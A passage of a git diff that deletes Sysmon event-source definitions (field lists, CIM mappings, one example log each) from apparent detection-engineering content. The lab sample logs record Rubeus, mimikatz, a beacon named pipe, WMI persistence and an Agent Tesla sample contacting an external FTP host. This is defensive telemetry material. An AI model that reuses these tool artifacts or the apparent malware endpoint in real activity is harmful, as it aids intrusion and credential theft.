-example_log: 10341000x8000000000000000150624412Microsoft-Windows-Sysmon/Operationalwin-dc-128.attackrange.local-2022-02-01 21:01:44.670{3BF36828-9F6D-61F9-390A-02000000CF01}1272956C:\Tools\Rubeus.exe{3BF36828-4B37-61E8-0900-00000000CF01}572C:\Windows\system32\winlogon.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c01f5|UNKNOWN(00007FFD8E245F0C)
diff --git a/data_sources/endpoint/event_sources/Sysmon_EventID_11.yml b/data_sources/endpoint/event_sources/Sysmon_EventID_11.yml
deleted file mode 100644
index 493b8dc4b6..0000000000
--- a/data_sources/endpoint/event_sources/Sysmon_EventID_11.yml
+++ /dev/null
@@ -1,82 +0,0 @@
-event_name: Sysmon EventID 11
-fields:
-- _time
-- Channel
-- Computer
-- CreationUtcTime
-- EventChannel
-- EventCode
-- EventData_Xml
-- EventDescription
-- EventID
-- EventRecordID
-- Guid
-- Image
-- Keywords
-- Level
-- Name
-- Opcode
-- ProcessGuid
-- ProcessID
-- ProcessId
-- RecordID
-- RecordNumber
-- RuleName
-- SecurityID
-- SystemTime
-- System_Props_Xml
-- TargetFilename
-- Task
-- ThreadID
-- TimeCreated
-- UserID
-- UtcTime
-- Version
-- action
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc_nt_host
-- event_id
-- eventtype
-- file_create_time
-- file_name
-- file_path
-- host
-- id
-- index
-- linecount
-- object_category
-- process_exec
-- process_guid
-- process_id
-- process_name
-- process_path
-- punct
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::eventtype
-- tag::object_category
-- timeendpos
-- timestartpos
-- user_id
-- vendor_product
-field_mappings:
-- data_model: cim
- data_set: Endpoint.Filesystem
- mapping:
- Computer: Filesystem.dest
- ProcessGuid: Filesystem.process_guid
- ProcessId: Filesystem.process_id
- TargetFilename: Filesystem.file_path
-example_log: 11241100x80000000000000007712490Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-84.attackrange.localDownloads2023-02-08 13:01:11.053{0F9A6540-A70E-63E2-3091-00000000BD02}9332C:\Users\Administrator\Downloads\mimikatz_trunk\x64\mimikatz.exeC:\Users\Administrator\Downloads\mimikatz_trunk\x64\CURRENT_USER_My_4_atomic@art2.local.pfx2023-02-08 13:01:11.053
diff --git a/data_sources/endpoint/event_sources/Sysmon_EventID_12.yml b/data_sources/endpoint/event_sources/Sysmon_EventID_12.yml
deleted file mode 100644
index 433e2e81c9..0000000000
--- a/data_sources/endpoint/event_sources/Sysmon_EventID_12.yml
+++ /dev/null
@@ -1,77 +0,0 @@
-event_name: Sysmon EventID 12
-fields:
-- _time
-- Channel
-- Computer
-- EventChannel
-- EventCode
-- EventData_Xml
-- EventDescription
-- EventID
-- EventRecordID
-- EventType
-- Guid
-- Image
-- Keywords
-- Level
-- Name
-- Opcode
-- ProcessGuid
-- ProcessID
-- ProcessId
-- RecordID
-- RecordNumber
-- RuleName
-- SecurityID
-- SystemTime
-- System_Props_Xml
-- TargetObject
-- Task
-- ThreadID
-- TimeCreated
-- UserID
-- UtcTime
-- Version
-- action
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- object_category
-- object_path
-- process_exec
-- process_guid
-- process_id
-- process_name
-- process_path
-- punct
-- registry_hive
-- registry_key_name
-- registry_path
-- severity_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- status
-- tag
-- tag::eventtype
-- tag::object_category
-- timeendpos
-- timestartpos
-- user_id
-- vendor_product
-example_log: 12241200x80000000000000001055579Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteKey2021-07-12 08:10:32.592{466BC892-F8F2-60EB-107E-00000000CF01}10188C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-1112_Classes\exefile\shell\runas\command
diff --git a/data_sources/endpoint/event_sources/Sysmon_EventID_13.yml b/data_sources/endpoint/event_sources/Sysmon_EventID_13.yml
deleted file mode 100644
index acfd86bb0f..0000000000
--- a/data_sources/endpoint/event_sources/Sysmon_EventID_13.yml
+++ /dev/null
@@ -1,93 +0,0 @@
-event_name: Sysmon EventID 13
-fields:
-- _time
-- Channel
-- Computer
-- Details
-- EventChannel
-- EventCode
-- EventData_Xml
-- EventDescription
-- EventID
-- EventRecordID
-- EventType
-- Guid
-- Image
-- Keywords
-- Level
-- Name
-- Opcode
-- ProcessGuid
-- ProcessID
-- ProcessId
-- RecordID
-- RecordNumber
-- RegistryValueData
-- RegistryValueType
-- RuleName
-- SecurityID
-- SystemTime
-- System_Props_Xml
-- TargetObject
-- Task
-- ThreadID
-- TimeCreated
-- UserID
-- UtcTime
-- Version
-- action
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- object_category
-- object_path
-- process_exec
-- process_guid
-- process_id
-- process_name
-- process_path
-- punct
-- registry_hive
-- registry_key_name
-- registry_path
-- registry_value_data
-- registry_value_name
-- registry_value_type
-- severity_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- status
-- tag
-- tag::eventtype
-- tag::object_category
-- timeendpos
-- timestartpos
-- user_id
-- vendor_product
-field_mappings:
-- data_model: cim
- data_set: Endpoint.Registry
- mapping:
- Computer: Registry.dest
- ProcessGuid: Registry.process_guid
- ProcessId: Registry.process_id
- TargetObject: Registry.registry_path
- Details: Registry.registry_value_data
-example_log: 13241300x8000000000000000810987Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:11:04.547{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fd-0xd724b8c5)
diff --git a/data_sources/endpoint/event_sources/Sysmon_EventID_15.yml b/data_sources/endpoint/event_sources/Sysmon_EventID_15.yml
deleted file mode 100644
index 2fe8d4440e..0000000000
--- a/data_sources/endpoint/event_sources/Sysmon_EventID_15.yml
+++ /dev/null
@@ -1,79 +0,0 @@
-event_name: Sysmon EventID 15
-fields:
-- _time
-- Channel
-- Computer
-- Contents
-- CreationUtcTime
-- EventChannel
-- EventCode
-- EventData_Xml
-- EventDescription
-- EventID
-- EventRecordID
-- Guid
-- Hash
-- IMPHASH
-- Image
-- Keywords
-- Level
-- MD5
-- Name
-- Opcode
-- ProcessGuid
-- ProcessID
-- ProcessId
-- RecordID
-- RecordNumber
-- RuleName
-- SHA256
-- SecurityID
-- SystemTime
-- System_Props_Xml
-- TargetFilename
-- Task
-- ThreadID
-- TimeCreated
-- UserID
-- UtcTime
-- Version
-- action
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc_nt_host
-- event_id
-- eventtype
-- file_create_time
-- file_hash
-- file_name
-- file_path
-- host
-- id
-- index
-- linecount
-- os
-- process_exec
-- process_guid
-- process_id
-- process_name
-- process_path
-- punct
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user_id
-- vendor_product
-example_log: 15241500x8000000000000000667860Microsoft-Windows-Sysmon/Operationalproject-mumbai-host-2021-04-28 20:11:34.709{ED2ECF8A-C154-6089-F967-00000000BB01}7000C:\Users\DefaultAccount\AppData\Roaming\Telegram Desktop\Telegram.exeC:\Users\DefaultAccount\Downloads\Telegram Desktop\Good(NLA).txt:Zone.Identifier2021-04-28 20:11:33.238MD5=C785C55D5FA3443A11B8417209C4B524,SHA256=D07777E0DC36EBECCE3FA9644F0F44DC4A0B7EDE0CBC1F5D33E8D6CB07AF5B5C,IMPHASH=00000000000000000000000000000000[ZoneTransfer] ZoneId=3
diff --git a/data_sources/endpoint/event_sources/Sysmon_EventID_17.yml b/data_sources/endpoint/event_sources/Sysmon_EventID_17.yml
deleted file mode 100644
index 1aec8deb23..0000000000
--- a/data_sources/endpoint/event_sources/Sysmon_EventID_17.yml
+++ /dev/null
@@ -1,72 +0,0 @@
-event_name: Sysmon EventID 17
-fields:
-- _time
-- Channel
-- Computer
-- EventChannel
-- EventCode
-- EventData_Xml
-- EventDescription
-- EventID
-- EventRecordID
-- EventType
-- Guid
-- Image
-- Keywords
-- Level
-- Name
-- Opcode
-- PipeName
-- ProcessGuid
-- ProcessID
-- ProcessId
-- RecordID
-- RecordNumber
-- RuleName
-- SecurityID
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- TimeCreated
-- UserID
-- UtcTime
-- Version
-- action
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- os
-- pipe_name
-- process_exec
-- process_guid
-- process_id
-- process_name
-- process_path
-- punct
-- severity_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user_id
-- vendor_product
-example_log: 17141700x8000000000000000162168Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-CreatePipe2021-04-19 21:00:18.288{761B69BB-EF62-607D-B211-00000000BA01}6960\MSSE-1516-serverC:\Users\Administrator\Desktop\beacon.exe
diff --git a/data_sources/endpoint/event_sources/Sysmon_EventID_18.yml b/data_sources/endpoint/event_sources/Sysmon_EventID_18.yml
deleted file mode 100644
index b7dd594cfe..0000000000
--- a/data_sources/endpoint/event_sources/Sysmon_EventID_18.yml
+++ /dev/null
@@ -1,72 +0,0 @@
-event_name: Sysmon EventID 18
-fields:
-- _time
-- Channel
-- Computer
-- EventChannel
-- EventCode
-- EventData_Xml
-- EventDescription
-- EventID
-- EventRecordID
-- EventType
-- Guid
-- Image
-- Keywords
-- Level
-- Name
-- Opcode
-- PipeName
-- ProcessGuid
-- ProcessID
-- ProcessId
-- RecordID
-- RecordNumber
-- RuleName
-- SecurityID
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- TimeCreated
-- UserID
-- UtcTime
-- Version
-- action
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- os
-- pipe_name
-- process_exec
-- process_guid
-- process_id
-- process_name
-- process_path
-- punct
-- severity_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user_id
-- vendor_product
-example_log: 18141800x8000000000000000162173Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-ConnectPipe2021-04-19 21:00:19.312{761B69BB-EF62-607D-B211-00000000BA01}6960\MSSE-1516-serverC:\Users\Administrator\Desktop\beacon.exe
diff --git a/data_sources/endpoint/event_sources/Sysmon_EventID_20.yml b/data_sources/endpoint/event_sources/Sysmon_EventID_20.yml
deleted file mode 100644
index 92d3ee6374..0000000000
--- a/data_sources/endpoint/event_sources/Sysmon_EventID_20.yml
+++ /dev/null
@@ -1,75 +0,0 @@
-event_name: Sysmon EventID 20
-fields:
-- _time
-- Channel
-- Computer
-- Destination
-- DestinationNoQuotes
-- EventChannel
-- EventCode
-- EventData_Xml
-- EventDescription
-- EventID
-- EventRecordID
-- EventType
-- Guid
-- Keywords
-- Level
-- Name
-- Opcode
-- Operation
-- ProcessID
-- RecordID
-- RecordNumber
-- RuleName
-- SecurityID
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- TimeCreated
-- Type
-- User
-- UserID
-- UtcTime
-- Version
-- action
-- change_type
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- object
-- object_category
-- object_path
-- punct
-- severity_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_id
-- user_name
-- vendor_product
-example_log: 20342000x80000000000000006249Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-WmiConsumerEvent2020-12-08 13:54:48.514DeletedATTACKRANGE\Administrator "AtomicRedTeam-WMIPersistence-Example"Command Line "C:\\Windows\\System32\\notepad.exe"
diff --git a/data_sources/endpoint/event_sources/Sysmon_EventID_21.yml b/data_sources/endpoint/event_sources/Sysmon_EventID_21.yml
deleted file mode 100644
index 46a012ce43..0000000000
--- a/data_sources/endpoint/event_sources/Sysmon_EventID_21.yml
+++ /dev/null
@@ -1,77 +0,0 @@
-event_name: Sysmon EventID 21
-fields:
-- _time
-- Channel
-- Computer
-- Consumer
-- ConsumerNoQuotes
-- EventChannel
-- EventCode
-- EventData_Xml
-- EventDescription
-- EventID
-- EventRecordID
-- EventType
-- Filter
-- FilterNoQuotes
-- Guid
-- Keywords
-- Level
-- Name
-- Opcode
-- Operation
-- ProcessID
-- RecordID
-- RecordNumber
-- RuleName
-- SecurityID
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- TimeCreated
-- User
-- UserID
-- UtcTime
-- Version
-- change_type
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- object
-- object_attrs
-- object_category
-- object_path
-- punct
-- result
-- severity_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_id
-- user_name
-- vendor_product
-example_log: 21342100x8000000000000000151644Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-WmiBindingEvent2021-06-16 21:46:50.222ModifiedWIN-HOST-14\Administrator "CommandLineEventConsumer.Name=\"Evil Persistence\"" "__EventFilter.Name=\"Evil Persistence\""
diff --git a/data_sources/endpoint/event_sources/Sysmon_EventID_22.yml b/data_sources/endpoint/event_sources/Sysmon_EventID_22.yml
deleted file mode 100644
index 34a02fa4b9..0000000000
--- a/data_sources/endpoint/event_sources/Sysmon_EventID_22.yml
+++ /dev/null
@@ -1,70 +0,0 @@
-event_name: Sysmon EventID 22
-fields:
-- _time
-- Channel
-- Computer
-- EventChannel
-- EventCode
-- EventData_Xml
-- EventDescription
-- EventID
-- EventRecordID
-- Guid
-- Image
-- Keywords
-- Level
-- Name
-- Opcode
-- ProcessGuid
-- ProcessID
-- ProcessId
-- QueryName
-- QueryResults
-- QueryStatus
-- RecordID
-- RecordNumber
-- RuleName
-- SecurityID
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- TimeCreated
-- UserID
-- UtcTime
-- Version
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- process_exec
-- process_guid
-- process_name
-- punct
-- query
-- query_count
-- reply_code_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user_id
-- vendor_product
-example_log: 22542200x8000000000000000113892Microsoft-Windows-Sysmon/Operationalwin-dc-299.attackrange.local-2021-03-24 12:25:12.840{3CFDEE80-2F7D-605B-F50A-00000000AE01}717250.220.65.3.spam.dnsbl.sorbs.net9003-C:\Windows\System32\wermgr.exe
diff --git a/data_sources/endpoint/event_sources/Sysmon_EventID_23.yml b/data_sources/endpoint/event_sources/Sysmon_EventID_23.yml
deleted file mode 100644
index 328acf206f..0000000000
--- a/data_sources/endpoint/event_sources/Sysmon_EventID_23.yml
+++ /dev/null
@@ -1,82 +0,0 @@
-event_name: Sysmon EventID 23
-fields:
-- _time
-- Archived
-- Channel
-- Computer
-- EventChannel
-- EventCode
-- EventData_Xml
-- EventDescription
-- EventID
-- EventRecordID
-- Guid
-- Hashes
-- IMPHASH
-- Image
-- IsExecutable
-- Keywords
-- Level
-- MD5
-- Name
-- Opcode
-- ProcessGuid
-- ProcessID
-- ProcessId
-- RecordID
-- RecordNumber
-- RuleName
-- SHA256
-- SecurityID
-- SystemTime
-- System_Props_Xml
-- TargetFilename
-- Task
-- ThreadID
-- TimeCreated
-- User
-- UserID
-- UtcTime
-- Version
-- action
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc_nt_host
-- event_id
-- eventtype
-- file_hash
-- file_modify_time
-- file_name
-- file_path
-- host
-- id
-- index
-- linecount
-- object_category
-- process_exec
-- process_guid
-- process_id
-- process_name
-- process_path
-- punct
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::eventtype
-- tag::object_category
-- timeendpos
-- timestartpos
-- user
-- user_id
-- vendor_product
-example_log: 23542300x8000000000000000281771Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-865.attackrange.local-2023-02-01 10:57:09.814{F522A29C-446D-63DA-9F01-00000000BB02}2428ATTACKRANGE\AdministratorC:\Temp\swiftslicer.exeC:\Python311\vcruntime140_1.dllMD5=75E78E4BF561031D39F86143753400FF,SHA256=1758085A61527B427C4380F0C976D29A8BEE889F2AC480C356A3F166433BF70E,IMPHASH=BF380CA954CBF10D1A4CEF9EC18E46FDtruefalse - insufficient disk space
diff --git a/data_sources/endpoint/event_sources/Sysmon_EventID_3.yml b/data_sources/endpoint/event_sources/Sysmon_EventID_3.yml
deleted file mode 100644
index ec836a5df8..0000000000
--- a/data_sources/endpoint/event_sources/Sysmon_EventID_3.yml
+++ /dev/null
@@ -1,96 +0,0 @@
-event_name: Sysmon EventID 3
-fields:
-- _time
-- Channel
-- Computer
-- DestinationHostname
-- DestinationIp
-- DestinationIsIpv6
-- DestinationPort
-- DestinationPortName
-- EventChannel
-- EventCode
-- EventData_Xml
-- EventDescription
-- EventID
-- EventRecordID
-- Guid
-- Image
-- Initiated
-- Keywords
-- Level
-- Name
-- Opcode
-- ProcessGuid
-- ProcessID
-- ProcessId
-- Protocol
-- RecordID
-- RecordNumber
-- RuleName
-- SecurityID
-- SourceHostname
-- SourceIp
-- SourceIsIpv6
-- SourcePort
-- SourcePortName
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- TimeCreated
-- User
-- UserID
-- UtcTime
-- Version
-- action
-- app
-- creation_time
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_ip
-- dest_port
-- direction
-- dvc
-- dvc_ip
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- process_exec
-- process_guid
-- process_id
-- process_name
-- protocol
-- protocol_version
-- punct
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src
-- src_host
-- src_ip
-- src_port
-- state
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- transport
-- transport_dest_port
-- user
-- user_id
-- vendor_product
-example_log: 354300x8000000000000000156837Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-403.attackrange.local-2022-09-15 12:56:19.679{6820D070-1F1B-6323-E113-000000007402}5728C:\Temp\agent_tesla-deob.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-403.attackrange.local61722-false41.77.117.236youssef5.genious.net21ftp
diff --git a/data_sources/endpoint/event_sources/Sysmon_EventID_5.yml b/data_sources/endpoint/event_sources/Sysmon_EventID_5.yml
deleted file mode 100644
index 7da0d70117..0000000000
--- a/data_sources/endpoint/event_sources/Sysmon_EventID_5.yml
+++ /dev/null
@@ -1,69 +0,0 @@
-event_name: Sysmon EventID 5
-fields:
-- _time
-- Channel
-- Computer
-- EventChannel
-- EventCode
-- EventData_Xml
-- EventDescription
-- EventID
-- EventRecordID
-- Guid
-- Image
-- Keywords
-- Level
-- Name
-- Opcode
-- ProcessGuid
-- ProcessID
-- ProcessId
-- RecordID
-- RecordNumber
-- RuleName
-- SecurityID
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- TimeCreated
-- UserID
-- UtcTime
-- Version
-- action
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- os
-- process
-- process_exec
-- process_guid
-- process_id
-- process_name
-- process_path
-- punct
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user_id
-- vendor_product
-example_log: 534500x800000000000000039965Microsoft-Windows-Sysmon/Operationalwin-dc-654.attackrange.local-2021-03-16 14:01:44.004{26337912-BA32-6050-3506-00000000AE01}8672C:\Users\Public\steam.exe
diff --git a/data_sources/endpoint/event_sources/Sysmon_EventID_6.yml b/data_sources/endpoint/event_sources/Sysmon_EventID_6.yml
deleted file mode 100644
index a5189bfa22..0000000000
--- a/data_sources/endpoint/event_sources/Sysmon_EventID_6.yml
+++ /dev/null
@@ -1,71 +0,0 @@
-event_name: Sysmon EventID 6
-fields:
-- _time
-- Channel
-- Computer
-- EventChannel
-- EventCode
-- EventData_Xml
-- EventDescription
-- EventID
-- EventRecordID
-- Guid
-- Hashes
-- ImageLoaded
-- Keywords
-- Level
-- MD5
-- Name
-- Opcode
-- ProcessID
-- RecordID
-- RecordNumber
-- RuleName
-- SHA256
-- SecurityID
-- Signature
-- SignatureStatus
-- Signed
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- TimeCreated
-- UserID
-- UtcTime
-- Version
-- action
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- os
-- process_hash
-- process_path
-- punct
-- service_signature_exists
-- service_signature_verified
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user_id
-- vendor_product
-example_log: 644600x800000000000000015708989Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-702.attackrange.local-2022-04-04 17:37:04.640C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\npf.sysMD5=DE7FCC77F4A503AF4CA6A47D49B3713D,SHA256=4BFAA99393F635CD05D91A64DE73EDB5639412C129E049F0FE34F88517A10FC6trueRiverbed Technology, Inc.Valid
diff --git a/data_sources/endpoint/event_sources/Sysmon_EventID_7.yml b/data_sources/endpoint/event_sources/Sysmon_EventID_7.yml
deleted file mode 100644
index faf98ea79f..0000000000
--- a/data_sources/endpoint/event_sources/Sysmon_EventID_7.yml
+++ /dev/null
@@ -1,90 +0,0 @@
-event_name: Sysmon EventID 7
-fields:
-- _time
-- Channel
-- Company
-- Computer
-- Description
-- EventChannel
-- EventCode
-- EventData_Xml
-- EventDescription
-- EventID
-- EventRecordID
-- FileVersion
-- Guid
-- Hashes
-- IMPHASH
-- Image
-- ImageLoaded
-- Keywords
-- Level
-- MD5
-- Name
-- Opcode
-- OriginalFileName
-- ProcessGuid
-- ProcessID
-- ProcessId
-- Product
-- RecordID
-- RecordNumber
-- RuleName
-- SHA256
-- SecurityID
-- Signature
-- SignatureStatus
-- Signed
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- TimeCreated
-- User
-- UserID
-- UtcTime
-- Version
-- action
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- os
-- parent_process_exec
-- parent_process_guid
-- parent_process_id
-- parent_process_name
-- parent_process_path
-- process_exec
-- process_hash
-- process_name
-- process_path
-- punct
-- service_dll_signature_exists
-- service_dll_signature_verified
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::action
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_id
-- vendor_product
-example_log: 734700x800000000000000045273Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-2023-09-12 08:06:31.433{8814F3F5-1C07-6500-9600-000000000E03}4440C:\Users\Administrator\AppData\Local\Temp\server.exeC:\Users\Administrator\AppData\Local\Temp\server.exe-----MD5=696CBE2CB6F7FAC5ED6262BCA51238BB,SHA256=43005D86607DC94C7D378AA1B8844947BAA03860652F2F2340266061AF12E524,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744false-UnavailableATTACKRANGE\Administrator
diff --git a/data_sources/endpoint/event_sources/Sysmon_EventID_8.yml b/data_sources/endpoint/event_sources/Sysmon_EventID_8.yml
deleted file mode 100644
index 57382aab01..0000000000
--- a/data_sources/endpoint/event_sources/Sysmon_EventID_8.yml
+++ /dev/null
@@ -1,83 +0,0 @@
-event_name: Sysmon EventID 8
-fields:
-- _time
-- Channel
-- Computer
-- EventChannel
-- EventCode
-- EventData_Xml
-- EventDescription
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- Name
-- NewThreadId
-- Opcode
-- ProcessID
-- RecordID
-- RecordNumber
-- RuleName
-- SecurityID
-- SourceImage
-- SourceProcessGuid
-- SourceProcessId
-- StartAddress
-- StartFunction
-- StartModule
-- SystemTime
-- System_Props_Xml
-- TargetImage
-- TargetProcessGuid
-- TargetProcessId
-- Task
-- ThreadID
-- TimeCreated
-- UserID
-- UtcTime
-- Version
-- action
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- os
-- parent_process_exec
-- parent_process_guid
-- parent_process_id
-- parent_process_name
-- parent_process_path
-- process_exec
-- process_guid
-- process_id
-- process_name
-- process_path
-- punct
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src_address
-- src_function
-- src_module
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user_id
-- vendor_product
-example_log: 824800x8000000000000000362233Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-487.attackrange.local-2022-10-27 13:59:12.427{3381F800-8EB0-635A-1306-000000008A02}4864C:\Windows\SysWOW64\wermgr.exe{3381F800-8085-635A-2701-000000008A02}5572C:\Windows\System32\Taskmgr.exe49640x0000000000C20000--
diff --git a/data_sources/endpoint/event_sources/Sysmon_EventID_9.yml b/data_sources/endpoint/event_sources/Sysmon_EventID_9.yml
deleted file mode 100644
index 84018c25cd..0000000000
--- a/data_sources/endpoint/event_sources/Sysmon_EventID_9.yml
+++ /dev/null
@@ -1,69 +0,0 @@
-event_name: Sysmon EventID 9
-fields:
-- _time
-- Channel
-- Computer
-- Device
-- EventChannel
-- EventCode
-- EventData_Xml
-- EventDescription
-- EventID
-- EventRecordID
-- Guid
-- Image
-- Keywords
-- Level
-- Name
-- Opcode
-- ProcessGuid
-- ProcessID
-- ProcessId
-- RecordID
-- RecordNumber
-- RuleName
-- SecurityID
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- TimeCreated
-- UserID
-- UtcTime
-- Version
-- action
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- os
-- process_exec
-- process_guid
-- process_id
-- process_name
-- process_path
-- punct
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user_id
-- vendor_product
-example_log: 924900x8000000000000000190607Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-478.attackrange.local-2022-02-25 12:25:33.359{414E8EDF-CABB-6218-F103-000000003702}6068C:\Temp\c.exe\Device\HarddiskVolume1
diff --git a/data_sources/endpoint/event_sources/Sysmon_for_Linux_EventID_1.yml b/data_sources/endpoint/event_sources/Sysmon_for_Linux_EventID_1.yml
deleted file mode 100644
index 2261b4563c..0000000000
--- a/data_sources/endpoint/event_sources/Sysmon_for_Linux_EventID_1.yml
+++ /dev/null
@@ -1,91 +0,0 @@
-event_name: Sysmon for Linux EventID 1
-fields:
-- _time
-- Channel
-- CommandLine
-- Company
-- Computer
-- CurrentDirectory
-- Description
-- EventChannel
-- EventCode
-- EventData_Xml
-- EventDescription
-- EventID
-- EventRecordID
-- FileVersion
-- Guid
-- Hashes
-- Image
-- IntegrityLevel
-- Keywords
-- Level
-- LogonGuid
-- LogonId
-- Name
-- Opcode
